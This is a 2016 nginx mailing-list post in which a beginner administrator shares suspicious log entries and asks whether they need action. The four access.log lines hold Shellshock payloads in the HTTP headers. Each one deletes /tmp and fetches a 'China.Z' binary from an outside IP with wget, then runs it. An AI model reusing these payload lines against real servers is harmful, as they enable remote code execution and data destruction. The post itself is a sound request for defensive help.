Suspicious log records

janro nginx-forum at forum.nginx.org
Sat Oct 22 10:19:54 UTC 2016


Hi everyone.

I'm newbie with Nginx and with servers and I thought to ask your opinion
about the log input I noticed from last night.

There's clearly a some sort of malicious attempt in access.log which is
repeated four times. In error.log there's only 'closed keepalive connection'
 records, which matches with those four attempts.

Everything runs fine on server side. I just like to know that is this just a
normal day in a world of server logs or something critical that need
actions?

Access.log

61.147.247.161 - - [22/Oct/2016:00:10:14 +0300] "GET / HTTP/1.1" 301 184 "()
{ :; }; /bin/bash -c \x22rm -rf /tmp/*;echo wget http://123.249.7.198:8832/1
-O /tmp/China.Z-axgfh >> /tmp/Run.sh;echo echo By China.Z >>
/tmp/Run.sh;echo chmod 777 /tmp/China.Z-axgfh >> /tmp/Run.sh;echo
/tmp/China.Z-axgfh >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >>
/tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\x22" "() { :; }; /bin/bash -c
\x22rm -rf /tmp/*;echo wget http://123.249.7.198:8832/1 -O
/tmp/China.Z-axgfh >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo
chmod 777 /tmp/China.Z-axgfh >> /tmp/Run.sh;echo /tmp/China.Z-axgfh >>
/tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777
/tmp/Run.sh;/tmp/Run.sh\x22" "-"

61.147.247.161 - - [22/Oct/2016:00:11:08 +0300] "GET / HTTP/1.1" 301 184 "()
{ :; }; /bin/bash -c \x22rm -rf /tmp/*;echo wget http://123.249.7.198:8832/1
-O /tmp/China.Z-jshc\x98 >> /tmp/Run.sh;echo echo By China.Z >>
/tmp/Run.sh;echo chmod 777 /tmp/China.Z-jshc\x98 >> /tmp/Run.sh;echo
/tmp/China.Z-jshc\x98 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >>
/tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\x22" "() { :; }; /bin/bash -c
\x22rm -rf /tmp/*;echo wget http://123.249.7.198:8832/1 -O
/tmp/China.Z-jshc\x98 >> /tmp/Run.sh;echo echo By China.Z >>
/tmp/Run.sh;echo chmod 777 /tmp/China.Z-jshc\x98 >> /tmp/Run.sh;echo
/tmp/China.Z-jshc\x98 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >>
/tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\x22" "-"

61.147.247.161 - - [22/Oct/2016:00:12:28 +0300] "GET / HTTP/1.1" 301 184 "()
{ :; }; /bin/bash -c \x22rm -rf /tmp/*;echo wget http://123.249.7.198:8832/1
-O /tmp/China.Z-wbyb\xB0 >> /tmp/Run.sh;echo echo By China.Z >>
/tmp/Run.sh;echo chmod 777 /tmp/China.Z-wbyb\xB0 >> /tmp/Run.sh;echo
/tmp/China.Z-wbyb\xB0 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >>
/tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\x22" "() { :; }; /bin/bash -c
\x22rm -rf /tmp/*;echo wget http://123.249.7.198:8832/1 -O
/tmp/China.Z-wbyb\xB0 >> /tmp/Run.sh;echo echo By China.Z >>
/tmp/Run.sh;echo chmod 777 /tmp/China.Z-wbyb\xB0 >> /tmp/Run.sh;echo
/tmp/China.Z-wbyb\xB0 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >>
/tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\x22" "-"

61.147.247.161 - - [22/Oct/2016:00:13:29 +0300] "GET / HTTP/1.1" 301 184 "()
{ :; }; /bin/bash -c \x22rm -rf /tmp/*;echo wget http://123.249.7.198:8832/1
-O /tmp/China.Z-xxmb  >> /tmp/Run.sh;echo echo By China.Z >>
/tmp/Run.sh;echo chmod 777 /tmp/China.Z-xxmb  >> /tmp/Run.sh;echo
/tmp/China.Z-xxmb  >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >>
/tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\x22" "() { :; }; /bin/bash -c
\x22rm -rf /tmp/*;echo wget http://123.249.7.198:8832/1 -O /tmp/China.Z-xxmb
 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777
/tmp/China.Z-xxmb  >> /tmp/Run.sh;echo /tmp/China.Z-xxmb  >>
/tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777
/tmp/Run.sh;/tmp/Run.sh\x22" "-"

Error.log

2016/10/22 00:10:15 [info] 1751#0: *27218 client 61.147.247.161 closed
keepalive connection
2016/10/22 00:11:09 [info] 1751#0: *27219 client 61.147.247.161 closed
keepalive connection
2016/10/22 00:12:29 [info] 1751#0: *27220 client 61.147.247.161 closed
keepalive connection
2016/10/22 00:13:29 [info] 1751#0: *27221 client 61.147.247.161 closed
keepalive connection

Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270472,270472#msg-270472



More information about the nginx mailing list